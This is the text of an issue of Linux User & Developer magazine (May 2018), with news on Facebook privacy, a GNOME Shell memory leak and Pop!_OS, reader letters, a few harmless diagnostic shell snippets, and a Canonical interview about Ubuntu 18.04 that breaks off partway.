Linux User & Developer 191 - Control Containers


www.linuxuser.co.uk

The essential magazine for the GNU generation

Exclusive Canonical interview

Your ultimate guide: Control Containers
Level up your Docker skills • Master Vagrant scripting • Perfect configs for Ansible & Puppet

New Ubuntu! 18.04: cloud, containers, core, desktop, IoT, server

Special report: Ruby isn't dead
"We will do everything to survive" – Creator, Yukihiro "Matz" Matsumoto

Pi 3 B+: expert projects to try
> Super-size Pi storage

Tutorials
> Git: Master version control
> Make an assistant AI with Mycroft Core
> Arduino: DIY coffee maker
> Security: Stop root attacks

Also inside
» MX Linux 17.1: the wonderfully built distro that you've probably never heard of
» Security distros: four of the best secure distros in the Linux universe, tested
» Kernel in-depth
» TerraMaster's new NAS tested
The magazine for the GNU generation

Welcome to issue 191 of Linux User & Developer

Welcome to the UK and North America's favourite Linux and open source magazine. It's been another fascinating month in the open source world. Of course, Ubuntu 18.04 LTS has landed, but we've also seen strong open source advocate Nextcloud snag a seven-figure deal to supply the German federal government with a private Bundescloud for 300,000 civil servants. Then Microsoft floored a lot of people by revealing an entirely Linux-based OS for a microcontroller it is touting for IoT devices. The Linux Foundation's Jim Zemlin describes Microsoft's Linux usage as the "new normal" – and we shouldn't be surprised; plenty of companies now use Linux and FOSS when it makes money and practical sense. To that end we turn to our main feature this month, where we'll show you how to use open source containers and products from Ansible, Docker, Puppet and Vagrant to help recover systems and make deployments easier (p18). We've also covered what open source Ubuntu has to offer this time (p58), not just for desktop, but also server, cloud, containers and core. Enjoy!
Chris Thornett, Editor
[email protected] | Twitter: @linuxusermag | Facebook: facebook.com/LinuxUserUK

In this issue
» Control Containers, p18
» The Future of Ruby, p32
» Ubuntu 18.04, p58

New letters prize: the best letter wins an iStorage datAshur Pro! Find more details on page 11.
For the best subscription deal head to: myfavouritemagazines.co.uk/sublud
Save up to 20% on print subs! See page 30 for details.

Future PLC Quay House, The Ambury, Bath BA1 1UA

Editorial
Editor Chris Thornett [email protected] 01202 442244
Designer Rosie Webber
Production Editor Ed Ricketts
Editor in Chief, Tech Graham Barlow
Senior Art Editor Jo Gulliver

Contributors
Dan Aldred, Joey Bernard, Christian Cawley, John Gowers, Toni Castillo Girona, Jon Masters, Bob Moss, Paul O'Brien, Mark Pickavance, Calvin Robinson, Mayank Sharma, Alex Smith

Advertising
Media packs are available on request
Commercial Director Clare Dove [email protected]
Advertising Director Richard Hemmings [email protected] 01225 687615
Account Director Andrew Tilbury [email protected] 01225 687144
Account Director Crispin Moller [email protected] 01225 687335

International
Linux User & Developer is available for licensing. Contact the International department to discuss partnership opportunities.
International Licensing Director Matt Ellis [email protected]

Subscriptions
Email enquiries [email protected]
UK orderline & enquiries 0344 848 2852
Overseas order line and enquiries +44 (0)344 848 2852
Online orders & enquiries www.myfavouritemagazines.co.uk
Head of subscriptions Sharon Todd

Circulation
Head of Newstrade Tim Mathers

Production
Head of Production US & UK Mark Constance
Production Project Manager Clare Scott
Advertising Production Manager Joanne Crosby
Digital Editions Controller Jason Hudson
Production Manager Nola Cokely

Management
Managing Director Aaron Asadi
Editorial Director Paul Newman
Art & Design Director Ross Andrews
Head of Art & Design Rodney Dive
Commercial Finance Director Dan Jotcham

Printed by Wyndeham Peterborough, Storey's Bar Road, Peterborough, Cambridgeshire, PE1 5YS
Distributed by Marketforce, 5 Churchill Place, Canary Wharf, London, E14 5HU www.marketforce.co.uk Tel: 0203 787 9001
ISSN 2041-3270

All copyrights and trademarks are recognised and respected. Linux is the registered trademark of Linus Torvalds in the U.S. and other countries.

We are committed to only using magazine paper which is derived from responsibly managed, certified forestry and chlorine-free manufacture. The paper in this magazine was sourced and produced from sustainable managed forests, conforming to strict environmental and socioeconomic standards. The manufacturing paper mill holds full FSC (Forest Stewardship Council) certification and accreditation.

All contents © 2018 Future Publishing Limited or published under licence. All rights reserved. No part of this magazine may be used, stored, transmitted or reproduced in any way without the prior written permission of the publisher. Future Publishing Limited (company number 2008885) is registered in England and Wales. Registered office: Quay House, The Ambury, Bath BA1 1UA. All information contained in this publication is for information only and is, as far as we are aware, correct at the time of going to press. Future cannot accept any responsibility for errors or inaccuracies in such information. You are advised to contact manufacturers and retailers directly with regard to the price of products/services referred to in this publication. Apps and websites mentioned in this publication are not under our control. We are not responsible for their contents or any other changes or updates to them. This magazine is fully independent and not affiliated in any way with the companies mentioned herein.

If you submit material to us, you warrant that you own the material and/or have the necessary rights/permissions to supply the material and you automatically grant Future and its licensees a licence to publish your submission in whole or in part in any/all issues and/or editions of publications, in any format published worldwide and on associated websites, social media channels and associated products. Any material you submit is sent at your own risk and, although every care is taken, neither Future nor its employees, agents, subcontractors or licensees shall be liable for loss or damage. We assume all unsolicited material is for publication unless otherwise stated, and reserve the right to edit, amend, adapt all submissions.

Future plc is a public company quoted on the London Stock Exchange (symbol: FUTR). Chief executive Zillah Byng-Thorne • Non-executive chairman Peter Allen • Chief financial officer Penny Ladkin-Brand. www.futureplc.com Tel +44 (0)1225 442 244

www.linuxuser.co.uk 3
Contents

Cover feature: 18 Control Containers • 58 Top features of Ubuntu 18.04

OpenSource
06 News – Mozilla offers a partial solution for Facebook privacy issues
10 Letters – Write on, readers
12 Interview – We chat with Canonical about its vision for Ubuntu 18.04 – and beyond
16 Kernel Column – Jon Masters on the latest happenings

Features
18 Control Containers – Containers and scripts can save you time, help to recover systems and make deployments easier. Bobby Moss explains how to use Docker, Vagrant, Puppet, Ansible and more to create containers in the cloud or elsewhere, work with virtualisation, and manage deployments
58 Top features of Ubuntu 18.04 – Ubuntu 'Bionic Beaver' 18.04 represents the first long-term support release of a new generation of Canonical's leading Linux distribution, and brings with it a raft of exciting changes. We take an in-depth look at the new and improved features across all flavours of 18.04, from Desktop and Server to Cloud, Containers and Core, to see how it can make your computing life easier and more secure

Special Report
32 Ruby is alive and well – The venerable language may be 25 years old, but it's still going strong

Tutorials
36 Essential Linux: Git – Get started with Git and learn how to make use of its version control capabilities
40 Arduino: DIY coffee dispenser – Set up your own automated office coffee club with the help of an Arduino that's used as a keycard reader
44 Security: privilege escalation – Learn how attackers may gain root access by exploiting bugs and services
48 Python: TensorFlow – Use the open source neural network to automatically classify images
52 Programming: Rust – An introduction to systems programming with the 'safe C'

Practical Pi
72 Pi Project: PipeCam – Electronics technician Fred Fourie wanted to build an affordable underwater camera rig using inexpensive and easily sourceable components. His ingenious solution, PipeCam, involved a Raspberry Pi – and plenty of waterproof sealant
74 Boot your Pi 3 B+ from USB – You might not know it, but the new Pi 3 B+ can be booted from a USB-connected drive rather than an SD card. Find out how to set it all up
76 Mycroft: DIY voice assistant – Create your own Alexa/Google Home/Siri/Cortana alternative using Mycroft running on a Pi – and ensure all your data stays within your control!

Reviews
81 Group test: Security distros – We put four specialised builds that promise enhanced security to the test to see which keeps you the safest
86 Reviews: Hardware – How well do the TerraMaster F4-420 NAS and the Trendnet TEW-817DTR portable wireless router perform?
88 Distros: MX Linux 17.1 – A joint effort between the antiX and MEPIS communities which touts a clean and slick desktop experience
90 Fresh FOSS – Searchmonkey JAVA 3.2.0, beets 1.4.6 CLI media library, Gambas 3.11.0 for creating graphical apps for Linux, and SimpleScreenRecorder 0.3.10

Back page
96 Happy Forever Day – Another intriguing short story from sci-fi author Stephen Oram

94 Free downloads – We've uploaded a host of new free and open source software this month

SUBSCRIBE TODAY – Save up to 20 per cent when you subscribe! Turn to page 30 for more information

Issue 191 • May 2018 • facebook.com/LinuxUserUK • Twitter: @linuxusermag

www.linuxuser.co.uk 5
06 News & Opinion | 10 Letters | 12 Interview | 16 Kernel Column

Security

Facebook investigated, apologises for breach of trust
Mozilla offers solution: Facebook Container protects browsing activity and limits data-tracking

The headline-grabbing Cambridge Analytica scandal has hit users of all platforms, highlighting once again the importance of openness when it comes to the treatment of personal data by online services such as social networks. Keeping in mind that just 270,000 people used the 'thisisyourdigitallife' app, it is staggering that data for 50 million people (including friends and family of the app users) was then farmed, and used for political-campaign targeting in a process that began in 2014.

Mark Zuckerberg, as ever doing his best to distance Facebook from scandal, took the time to issue a full-page apology in several newspapers. In it, the billionaire CEO apologises for the 2014 breach of trust "that leaked Facebook data of millions of people" and reveals that along with limiting data to third parties, Facebook is "also investigating every single app that had access to large amounts of data before we fixed this," working on the basis that others have been able to gather similar volumes of data.

Despite the apologies ("I promise to do better for you"), and new privacy features in the mobile app, the fact remains that this data was acquired without illegally breaching servers. No one broke in or stole a database. Rather, as Nick Thompson of CBS News observed, "It worked because Facebook has built the craziest most invasive advertising model in the history of the world and someone took advantage of it."

Some feel that the damage has already been done; Facebook's brand was already tarnished by previous controversies and suspicion. It seems unlikely, however, that the platform will be abandoned overnight, giving the social network the opportunity to at least partially recover.

Targeting users fed up with Facebook's privacy abuses – particularly following the Cambridge Analytica scandal – Mozilla has issued a new browser extension that aims to tackle the issue of Facebook tracking. Two years in development – although that development has been recently accelerated for a prompt release – Facebook Container offers a solution to that most annoying question: "How do I quit Facebook without actually quitting?"

Mozilla was quick to remind users that tracking is a problem ("pages you visit on the web can say a lot about you. They can infer where you live, the hobbies you have, and your political persuasion"), and that Facebook "has a network of trackers on various websites. This code tracks you invisibly." Thus Mozilla's add-on aims to segregate Facebook activity, essentially isolating it from your other online activities.

While Mozilla is at pains to highlight that the Cambridge Analytica incident could not have been avoided with the use of its Facebook Container extension, the tool at least gives users the choice to limit what they share. Importantly (and unsurprisingly given the circumstances), Mozilla collects no information from the extension; it records only when the extension has been installed or removed.

Above: It's time to take control of Facebook data privacy with Mozilla's Facebook Container
Distro feed
Top 10
(Average hits per day, 30 days to 6 April 2018)

1. Manjaro 3248

2. Mint 2806

3. Ubuntu 1887

4. Debian 1526

5. elementary 1325

6. Solus 1290

7. MX Linux 1225

8. Fedora 968

9. Zorin 862

10. Antergos 783

Software

GNOME Shell memory leak bug discovered
If it's not fixed soon, Ubuntu 18.04 could ship with an annoying bug

Memory leaks have most famously affected browsers in the past, so the idea that a desktop environment should be subject to one of these resource-draining bugs is surprising. But GNOME Shell 3.26.2, which is most commonly found in Ubuntu 17.10, has a leak that has been spotted by a number of users, and reported as a bug.

It appears the bug is triggered by performing actions with an associated animation. Things such as opening the overview, minimising windows or simply switching them can result in a system that grinds to a halt after a few hours of use, hitting productivity. That's not ideal, especially if you're using a laptop; you can't just reboot your way out of trouble if the added load has also drained your battery.

Once triggered, RAM use increases minute by minute. The problem is best illustrated by launchpad.net user Jesus225: "No matter what you do, gnome-shell eats up RAM slowly… After one day of usage (just web browsing) gnome-shell increased RAM usage from 100M to 350M. It does not free it up even if you close all windows. In my 4GB machine, it means that either I restart every day or I start facing swap issues the second day", they said.

Subsequent investigation has proved that the problem does indeed exist, summarised best by developer Georges Basile Stavracas: "I suspect we're leaking the final buffer somewhere". He has traced the issue, noting that "something is going on with the Garbage Collector." A tool for automatic resource recovery, Garbage Collection principles have been used for over 65 years, so a failure here might be seen as somewhat embarrassing. Attempting to unpack the issue, Stavracas reported that after giving up hope, "I found a very interesting behavior that I could reproduce […] Triggering garbage collection was able to reduce the amount of memory used by GNOME Shell to normal levels."

It's perhaps surprising that it took so long for the bug to be spotted, but will the fix be ready in time for Ubuntu 18.04 LTS?

This month: In development (4) • Stable releases (22)
BSD operating systems have recently seen a renaissance, with FreeBSD-based TrueOS hovering in the top 10 and other options in the top 100.

Highlights
TrueOS – TrueOS prides itself on being easy to install, with a graphical installation system and a good number of pre-configured desktop environments.
OpenBSD – Security-focused, OpenBSD 6.3 features ISO support in the virtual machine daemon, updates to LibreSSL and OpenSSH, and SMP for ARM64 systems.
NetBSD – This popular implementation of the Berkeley Software Distribution is a lightweight OS designed to work on a wide range of hardware platforms.

Latest distros available: filesilo.co.uk
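If you want to see whether your own session suffers the RAM creep described in the GNOME Shell story, the figure is easy to read straight from /proc. This is a minimal sketch, assuming a Linux system; it falls back to the current shell's PID so it still runs on machines where gnome-shell isn't present.

```shell
#!/bin/sh
# Read the resident set size (VmRSS) of a process from /proc.
# On an affected desktop this picks up gnome-shell; here we fall back
# to the current shell's PID so the sketch runs on any Linux box.
pid=$(pgrep -o gnome-shell 2>/dev/null || echo $$)

rss_kb=$(awk '/^VmRSS:/ {print $2}' "/proc/$pid/status")
echo "PID $pid resident memory: ${rss_kb} kB"
```

Run it every few minutes (from a loop or cron); a figure that climbs steadily with all windows closed is the tell-tale sign of the leak.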

www.linuxuser.co.uk 7
OpenSource Your source of Linux news & views

Gaming

Steam Machines on the way out?
Valve announces a change of strategy for its Linux boxes

Once touted as the brave new future for PC gaming, Steam Machines – console-like PCs running the Linux-based SteamOS and produced by Alienware, Asus and others – somehow went largely unnoticed. Perhaps it was SteamOS's lack of traction, or perhaps Steam's own Link game-streaming boxes nixed the idea of Steam Machines before it could really get going.

Whatever the case, Valve is no longer promoting Steam-powered PCs via the Hardware link on the Steam website or its desktop client – although the page itself has not been removed.

When its "routine cleanup" eventually morphed into an 'anti-Steam Machines' conspiracy theory, Valve opted to address concerns. Overall, it appears to be a general change of strategy, although the Steam Machines are still available; they can be searched for in Steam, and the Steam Machines page is still live, just not easily found. In a blog post on 4 April, Valve's Pierre-Loup Griffais emphasised that Steam's strategy hasn't really changed. "While it's true Steam Machines aren't exactly flying off the shelves… we're still working hard on making Linux operating systems a great place for gaming and applications. We think it will ultimately result in a better experience for developers and customers alike, including those not on Steam. SteamOS will continue to be our medium to deliver these improvements to our customers, and we think they will ultimately benefit the Linux ecosystem at large."

Among these improvements are investment in the Vulkan graphics API and shader pre-caching. Steam Machines or not, Valve isn't giving up on Linux just yet.

Above: Steam Machines aren't quite dead, but they are on life support

Hardware

Intel discontinues its graphics updater
Many new distros just don't need it any more

As Linux distributions develop and improve, it isn't unusual for third-party tools and software to adapt. The Intel Graphics Update Tool is a good example. Released in 2013 to give Linux users a safe and reliable way to install and upgrade to stable drivers and firmware on Intel graphics hardware, five years down the line the software has become largely redundant.

The Intel graphics blog announced on 8 March that "users will notice Fedora 27 and Ubuntu 17.10 and beyond are very current. Therefore, we are discontinuing the Update Tool as of version 2.0.6. The final version 2.0.6 of the update tool was targeted specifically at both Ubuntu 17.04 and Fedora 26. Earlier revisions for those Linux distributions are no longer being supported."

Previously known as the Intel Graphics Installer for Linux, the tool was used widely on systems with Intel graphics. Typically laptops, some desktops and many all-in-ones also rely on Intel graphics. So with the update tool put out to pasture, how will you keep your Linux system's graphics up to date? Is a new laptop or GFX card required?

In the case of Ubuntu and Fedora at least, the inclusion of Intel graphics support in these distributions (and downstream) means that the update tool is no longer required. With other distros, the case isn't so clear-cut. Over the years, many users have relied on the Intel graphics support forum for help and assistance. This will not immediately close; the blog announced that the forum will be maintained for a while, before being reconfigured as an archive. Users running older distros and hardware will be hit hardest by this, so upgrade wherever possible.
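Because the Intel graphics driver now ships in-tree with your distribution's stock kernel, you can check what you're running without any vendor tool. A small sketch, assuming a Linux system; on machines without Intel graphics it will simply report that the module isn't loaded.

```shell
#!/bin/sh
# The in-tree i915 driver tracks the kernel itself, so the kernel
# release number is the quickest gauge of how current your support is.
kernel=$(uname -r)
echo "Running kernel: $kernel"

# /proc/modules lists every loaded kernel module, one per line.
if grep -q '^i915 ' /proc/modules 2>/dev/null; then
    echo "i915 driver: loaded"
else
    echo "i915 driver: not loaded"
fi
```

If the module is loaded and the kernel is one your distro still updates, your graphics stack is being kept current through ordinary system updates.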

Distro update

Pop!_OS: In pursuit of an efficient and creative environment for users
Since announcing its own Linux distribution called Pop!_OS, System76 has been building steadily to the launch of 18.04

Carl Richell – Carl is the founder and CEO of System76, a manufacturer of Linux computers.

Before Pop!_OS, our attention was focused on ensuring our computer hardware ran flawlessly with Linux. When the end of Unity was announced last year, it created a lot of unknowns among the team; but what started as an unknown quickly became an opportunity. For over 12 years, we had been outsourcing one of System76's most important customer interactions, the desktop experience – and during this tenure, we collected tons of data: a list of customer requests for an improved desktop interface.

Linux excels in the fields of computer science, engineering and DevOps – this is where our customers live. It's important for us to make sure we create the most productive computer environment for them to be efficient, free and creative. During the first Pop release, we addressed the most common pain-points we heard from customers with the Linux desktop: the initial user setup time, bloatware, the need for up-to-date drivers and software, and a fast and functional app center.

Additionally, it was important that Pop!_OS provided a pleasant experience for non-System76 customers. This meant ensuring Pop!_OS was lighter, faster and more stable than the experience people were used to. If Pop!_OS can turn unusable machines into working units, this is a win for a maker. It means wider accessibility, enabling anyone to create a project using a more powerful desktop interface.

It's with the second launch, 18.04, where we really start to make an impact. So what's different?

Heightened security
Pop!_OS encrypts your entire installation by default. Our new installer also enables full-disk encryption for pre-installs that ship from System76 or another OEM. System76's laptops that use Pop!_OS also receive a feature that provides automatic firmware updates, ensuring the PC is always secure and reliable.

Performance management
18.04 includes an improved battery-level indication so users can stay on top of their remaining power. We've also added a CPU and GPU toggle to switch between power profiles from the system menu, such as NVIDIA Optimus, energy-saving, high-performance and others.

New installer experience
The new installer is designed with a story arc of artwork that carries you through the installation and permeates through the operating system. The installer does four things: enables us to ship computers with full-disk encryption; simplifies the installation process; installs extremely fast; and demonstrates the artwork and style that will begin to permeate other areas of the operating system, as seen in the new Pop!_Shop artwork.

USB flashing utility
Popsicle is a new utility that launches when you double-click an ISO in the file manager. It is a USB startup disk creator that can flash one or many hundreds of USB drives at once.

Other new features include a Do Not Disturb switch to nix notifications, easy HiDPI and standard DPI switching for mixed displays or legacy applications, curated applications in the Pop!_Shop with new artwork, and systemd-boot and kernelstub replacing GRUB on new UEFI installs.

18.04 was a result of maintaining inclusion and collaboration from the Pop!_OS community team, working with elementary OS on the new Linux installer and, of course, the massive amount of work that occurs upstream in GNOME, Ubuntu, Debian, the kernel and countless other projects. There was a lot of testing required in order to ensure Pop!_OS was compatible across various types of hardware configurations.

One of the things we're most grateful for is having such an active Pop!_OS community, which has been energetic in providing feedback. We'd like to continue improving the OS as a tool to enhance your workflow productivity and we always welcome more feedback. So give Pop a try at https://system76.com/pop and tell us what you need at www.reddit.com/r/pop_os.
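At its core, a startup-disk creator like Popsicle performs a raw block copy of the image to the target drive, flushes it, then verifies the write. The sketch below mimics that safely using temporary files rather than a real device; on actual hardware the target would be a device node such as /dev/sdX, which you should double-check with lsblk first, as dd overwrites whatever it is pointed at.

```shell
#!/bin/sh
# Simulate flashing an image: raw-copy it to a target, flush, verify.
# Both ends are temp files so the example is harmless to run; a real
# flash would use of=/dev/sdX (identify the right drive with lsblk!).
img=$(mktemp) && target=$(mktemp)
head -c 1048576 /dev/urandom > "$img"    # stand-in 1 MiB "ISO"

dd if="$img" of="$target" bs=64k conv=fsync 2>/dev/null
result=$(cmp -s "$img" "$target" && echo "flash verified" || echo "verify FAILED")
echo "$result"

rm -f "$img" "$target"
```

The conv=fsync flag makes dd flush data to the target before exiting, and cmp performs the byte-for-byte verification, which is broadly what a graphical flasher reports as its progress and verify stages.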

www.linuxuser.co.uk 9
Comment

Your letters
Questions and opinions about the mag, Linux and open source

Qubes tips
Dear LU&D, I enjoyed the Qubes OS tutorial in LU&D189 (Features, p60), and thought I would share with you three glitches that might put some newcomers off.

Firstly, the installer seems to offer no way to overwrite a previous OS (in my case, Windows 10) and instead tried to squeeze the install into some free space. This meant I had to create a live USB (I used Mint) just to use its Disks program to delete the partitions. Other readers may benefit from planning this in advance.

Having got past that hurdle I felt some newcomers might be perturbed by the uneven progress of the installation, which apparently counts files not megabytes, and thus appears to 'stall' while installing large files like the templates. The workaround is not to watch too closely: trust that the number of files will increment again if you leave it for twenty or thirty minutes.

After a reboot I had the chance to select optional templates, and these took a while to install, with a progress bar that travelled from side to side during the process. After playing with Qubes and deciding to use it seriously, I noted from the tutorial that a new version was imminent. I thought that I would do a fresh install of Qubes 4.0 and downloaded it. This version has a similarly uneven progress bar at the install stage, and after the reboot the side-to-side motion of the second progress bar froze completely. Leaving the computer for an hour or so, when I came back it had nonetheless completed its configuration.

The moral again is, don't panic! Do not assume because the progress gauge freezes that the process has 'hung'. Have a cuppa or even a meal before giving up! Anyway, many thanks for the tutorial and I hope my comments might encourage others to persevere with a couple of glitches that turn out to be purely cosmetic, and to reassure them that once installed the default config is much more reliable than the slightly uneven installer.
River Att

Chris: Great advice there. Personally, I've not experienced the problem you mentioned with being unable to overwrite a Windows OS. In Qubes R3.2's Installation Summary, under the System option you can select custom partitioning. On the next screen I was able to choose 'I will configure partitioning' and use a manual partitioning GUI to remove existing OS partitions and create the required partitions for Qubes OS (as you would do in GParted). However, this may be an issue with Windows, as we're usually deleting Linux distros when installing.

Regarding 4.0, we were holding on for the RC4 to be confirmed as the final, but it didn't come in time for our disc deadline, unfortunately. It turned out that the project released an RC5 before going on to full release, so it was probably the right call. Fortunately, Qubes OS 3.2 is being supported for a further year after 4's release, rather than the usual six months, because of the new hardware certification requirements for Qubes 4.0. We would suggest that if you want to follow the tutorial you should use 3.2, but for general use we'd recommend grabbing the latest release.

Right: Keep calm and install Qubes: good advice from one of our readers

Top tweet
MX Linux is an up-and-coming distro, but this quick straw poll told us that it probably needed a little profile-raising help. It's on the disc, so try it out!

Follow us – Facebook: facebook.com/LinuxUserUK • Twitter: @linuxusermag

The missing middle
I love your magazine and have read it since I first decided to try Linux, and bought it with the Ubuntu 16.04 cover disc to use as my first Linux OS. I've now moved away from Ubuntu and happily swap between (admittedly mostly Debian-based) distros without any worry.

The thing I've been finding for some time is that I seem to be caught in the middle with your articles. You have some great features for beginners and what look like great tutorials for more advanced users, but I just seem to be floundering – frustrated that I get all the basics, but unable to feel like I can get to grips with the more advanced features.

Have you thought about creating guides for those of us who are relatively new to Linux and feel like more than beginners, but aren't quite ready to get to grips with the more complex stuff?
Lee Burgum

Chris: Thanks for your feedback, Lee. It is hard to please everyone all the time, but we do try to make it so that even the complex subjects we cover are accessible to the 'average' (if there is such a thing) Linux user. However, by the sound of it we aren't quite hitting the mark for a portion of our loyal readers.

As usual, we'd be interested to know what subjects interest 'middling-experienced' users. You can email us with your thoughts at [email protected] or, if you haven't already done so, please fill in the Linux User and Developer Reader Survey (https://www.surveymonkey.co.uk/r/LUDSurvey2018). The survey is a genuine chance to guide what we do and already we've seen some clear indications of what you like – so thank you, dear readers, it's greatly appreciated.

Left: Don't delay, fill in the Linux User & Developer Reader Survey today! Help us make the mag even better and get 10 per cent off Linux products at www.myfavouritemagazines.co.uk, a free copy of the 6th edition Python Book and a chance to win a stylish Varidesk Exec 40 adjustable desk worth £495 ($550)!

Competition – WIN THIS! iStorage datAshur Pro!
This issue's winner: River Att
Impart your Linux wisdom to an adoring audience or rant if you must – just send your letters to [email protected]. The best letter wins a 16GB iStorage datAshur Pro USB 3.0 flash drive worth £89! As well as offering XTS-AES 256-bit encryption, this drive will delete a user's login after ten failed attempts and hold the data secure for an admin's PIN. If the admin fails ten times the drive data is deleted permanently. For more details head to https://istorage-uk.com.

Sans disc
The only (two) copies that I could find of issue 188 of Linux User & Developer, February 2018, did not have their DVDs. I went ahead and purchased one as I really wanted the articles on Virtualise Your System, but was wondering about getting a DVD with the software. When I spoke with the vendor, they said that those were the only ones they had in inventory. I find thieves despicable.
David Smith

Chris: Yes, we hate when the tea-leafs rip off the discs and skulk away, too. Sorry there were only two copies, David. If everyone wants to see better distribution of the magazine please feel free to scream (politely) at our management. You could always tweet @futureplc or use the contact form at www.futureplc.com/contact to ask for more copies. Better still, subscribing is the way to go and the best deals are always at our dedicated magazine portal https://www.myfavouritemagazines.co.uk/sublud for UK, Europe and US subs.

Below: Don't feed the disc rage – leave them on the magazine or David will find you. Yes, you there
www.linuxuser.co.uk 11
OpenSource Your source of Linux news & views

Interview Canonical

Ubuntu 18.04: Sandboxes, surveys and GNOME Shell

As Canonical continues its pursuit of profitability, we spoke to the Desktop
and Server teams at the company to decipher their ambitions for the
release of 18.04 – and their plans for the future

Will Cooke
Will is the desktop director at Canonical, who oversees putting the
desktop ISO together.

David Britton
David is the engineering manager of Ubuntu Server at Canonical.

The release of Bionic Beaver is important. Not only is it the LTS – with
five years’ worth of support – that will see millions of users installing
Ubuntu for the first time with GNOME firmly nestled in the desktop
environment slot, but it could be the release that sees Canonical through
an IPO. We spoke to the team in early April about the overall goals for
Ubuntu 18.04 LTS.

WILL COOKE: Typically, we find that most of our users like to install it
once, and then leave it alone, and know that it’ll look after itself. That’s
more important in the cloud environment than it is on the desktop,
perhaps. But the joy of Ubuntu is that you can do all of [your] development
on your machine, and then deploy it to the cloud, running the same
version of Ubuntu, and be safe in the knowledge that the packages that
are installed on your desktop are exactly the same as the ones that are in
your enterprise installation.

When you’ve got thousands of machines deployed in the cloud in some
way, the last thing you want to be doing is maintaining those every single
year and upgrading them, and dealing with all the fallout that happens
there. So the overarching theme for Ubuntu 18.04 is this ability to develop
locally and deploy to your servers – the public cloud, your private cloud,
whatever you want to do – but also edge devices, as well.

So we’ve made lots of advances in our Ubuntu Core products [see p68],
which is a really small, cut-down version of Ubuntu that ships with just
the bare minimum that you need to bring a device up and get it on the
network. So the packages that you can deploy to your servers, to your
desktop, can also be deployed to the IoT devices, to the edge devices,
to your network switches. That gives you a really unparalleled ability
and reliability to know that the stuff you’re working on can be packaged
up, pushed out to these other devices, and it will continue to work in the
same way that it works on your desktop.

A key player in that story is the snap packages that we’ve been working
on. These are self-contained binaries that work not only on Ubuntu, but
also on Fedora or CentOS or Arch.

So as an application developer, for example – not a desktop application
necessarily, but it could be a web app, it could be anything – you can
bundle up all of those dependencies into a self-contained package, and
then push that out to your various devices. And you know that it will work,
whether they run Ubuntu or not. That’s a really powerful message to
developers: do your work on Ubuntu; package it up; and push it out to
whatever device is running Linux, and you can be reliant on it continuing
to work for the next five years.

What’s the common problem that devs have with DEBs and RPMs that
has led to the snaps format?
WC: There are a few. Packaging DEBs – or RPMs, for that matter – is a bit
of a black art. There’s a

Top Right You can try Communitheme with an early snap by installing it
with snap install communitheme, or wait for 18.10. Once installed, just
log out and select it from the cog options

Quick guide
Beyond 18.04: GNOME Shell 4
Wayland, the display server protocol, wasn’t stable enough to be the
default for Ubuntu 18.04 LTS, but it’s definitely coming and will benefit
from other technologies that are being worked on. As well as PipeWire
(for improving video and audio under Linux), we’re likely to see an
architecture change with GNOME Shell 4. However, things aren’t that
simple, as Will Cooke explained: “GNOME Shell 4 is a bit of a strange
topic. GNOME tell me they have never said there is going to be a GNOME
Shell 4. There will be a GNOME 4 – you know, a new version of all the
libraries and all the applications and all that kind of thing. But they
haven’t actually committed to doing a whole new shell or changing the
way that it works.”
One of the ideas for GNOME 4 is to significantly change the experience
during a display server crash. For example, if the display server crashes
while you are working on a LibreOffice document, there’s a chance
that it may not be auto-saved, and you’ll lose all of that work: “At the
moment, if the compositor Mutter in the GNOME stack crashes in
Wayland, it crashes Wayland and it crashes your entire session. So
you’re thrown back to the login screen, and all of the applications that
you’re running get killed and you’re back in the position of just switching
your machine on.”
One of the considerations for GNOME 4 is to make a crash play out
more like X.Org in the future: “The display server can restart and the
shell can restart, and all of the applications will continue running in the
background. So you might not even notice that there was a problem.”

Above Regardless of the confusion over GNOME Shell 4’s existence,
Canonical seems confident that the new shell will bring a change to how
Wayland deals with display server crashes

certain amount of magic involved in that. And the learning process to go
through it, to understand how to correctly package something as a DEB
or RPM – the barrier to entry is pretty high there. So snaps simplify a lot
of that.

Again, part of the fact, really, is this ability to bundle all the
dependencies with it. If you package your application and you say,
“Okay, I depend on this version of this library for this architecture,” then
the dependency resolution might take care of that for you. It probably
would do. But as soon as your underlying OS changes that library, for
example, then your package breaks. And you can never be quite sure
where that package is going to be deployed, and what version of what OS
it’s going to end up on.

So by bundling all of that into a snap you are absolutely certain that all
of your dependencies are shipped along with your application. So when it
gets to the other end, it will open and run correctly.

The other key feature, in my mind, is the security confinement aspect.
X.Org, for example, is a bit long in the tooth now. It was never really
designed with secure computing in mind. If something is running as root,
or it’s running as your user, then it has the permissions of that user that’s
running it.

So you can install an application where the dev, for example, could go
into your home directory, go into your SSH keys directory, make a copy
of those, and email them off somewhere. It will do that with the same
permissions as the user that’s running it. And yeah, that’s a real concern.
With snaps and confinement, you can say, “This application, this snap,
is not allowed access to those things.” It physically won’t be able to read
those files off the disk. They don’t exist as far as it’s concerned. So those,
in my mind, are the two key stories: the write-once, run-anywhere side of
things, and then the confinement security aspect as well.

With snaps, you’ve got a format that allows proprietary products to
come to Linux much more easily than before. Do you not feel that there’s
a danger that it creates no inclination to actually open up those products?
WC: At the end of the day, it’s the users that are going to choose which
application they want. We’ve seen a lot of interest in Spotify, for example.
It was there anyway – we’re just making it a lot easier for people to get
their hands on it, and indeed they do want to get their hands on it.

From a pragmatic point of view, and from a user-friendliness point of
view as much as anything, given that all of the other tools that you might
need… if you’re a web developer [for example], there are dozens of IDEs.
If what’s stopping you from using Linux is that you can’t use Skype or
something like that, because you have to for work, then absolutely, let’s
solve those use cases and open it up to more and more people.

Going on to talk about aesthetics a little, I wondered how the Ubuntu
community theme (Communitheme) was progressing?
WC: It’s going well, yeah. So it’s not quite good enough for 18.04. There’s
still quite a few bugs that need fixing, specifically around GTK+ 2
applications.


Above A tip for you: Canonical’s corporate-focused Ubuntu Advantage
support suite is actually free for up to three machines. It includes a
Livepatch feature that installs hot patches for your kernel, so you’ll
always be up to date with any of the major CVEs (vulnerabilities)

GTK+ 3, I’d say, is pretty much done now, theme-wise. GTK+ 2
applications – there’s only a few of them, but there are some bugs that
need fixing. But yes, it’s looking really good. It looks fresh, it looks very
professional. So we’ll be looking to ship that in 18.10. But in the meantime,
we’re also working on getting it packaged up as a snap for 18.04 users to
install. So if you want to try the new theme, you can snap-install it and log
into a new session which will give you that theme, and that snap will be
refreshed pretty much every single night. In the next cycle, the 18.10 cycle,
we should see it on there by default, which is very exciting.

The switch to X.Org from Wayland as the default – could you explain
the reasoning for doing that?
WC: Yeah. When we started with GNOME Shell in 17.10, Wayland was
looming large. The benefits of Wayland come back to the security story.
For example, applications can’t snoop on other applications. They can’t
